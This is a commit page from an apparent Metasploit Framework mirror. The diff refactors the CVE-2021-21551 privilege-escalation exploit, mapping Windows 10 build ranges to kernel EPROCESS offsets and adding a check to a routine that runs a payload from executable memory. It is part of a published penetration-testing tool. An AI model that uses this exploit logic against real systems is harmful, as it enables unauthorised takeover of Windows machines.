github
/
metasploit-framework
mirror of https://github.com/rapid7/metasploit-framework
1
Fork 0
Code Releases Activity

Fix Windows 10 versioning by using ranges

This commit is contained in:
Spencer McIntyre 2021-05-18 10:26:52 -04:00
parent aae474a4d0
commit c5b022e2f2
3 changed files with 28 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2021-21551/CVE-2021-21551.x64.dll
View File

Binary file not shown.

52
external/source/exploits/CVE-2021-21551/exploit.c vendored
View File

@ -8,6 +8,8 @@ fNtQuerySystemInformation NtQuerySystemInformation = NULL;
fRtlGetNtVersionNumbers RtlGetNtVersionNumbers = NULL;
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
if (!pMsfPayload)
return;
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pPayload)
return;
@ -35,6 +37,7 @@ BOOL ResolveRequirements(void) {
DWORD dwMajor, dwMinor, dwBuild;
RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
dwBuild = LOWORD(dwBuild);
dprintf("[*] Windows version: %u.%u.%u", dwMajor, dwMinor, dwBuild);
if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7600)) {
g_pEprocessOffsets = &EprocessOffsetsWin7Sp0;
@ -45,32 +48,29 @@ BOOL ResolveRequirements(void) {
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 14393)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 15063)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 16299)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17763)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 19041)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
/* targets for Windows 10 v1607 - v2009 (20H2) */
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild >= 14393) && (dwBuild <= 19041)) {
if ((dwBuild < 15063)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
}
else if ((dwBuild < 16299)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
}
else if ((dwBuild < 17134)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
}
else if ((dwBuild < 17763)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
}
else if ((dwBuild < 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
}
else if ((dwBuild < 19041)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwBuild == 19041)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
}
}
else {
return FALSE;

4
external/source/include/windows/common.h vendored
View File

@ -47,9 +47,9 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1607 = { 0x2f0, 0x358, 0x2e8 };
/* Windows 10 v1703 (10.0.15063) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1703%20Redstone%202%20(Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1703 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update */
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1709 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0 };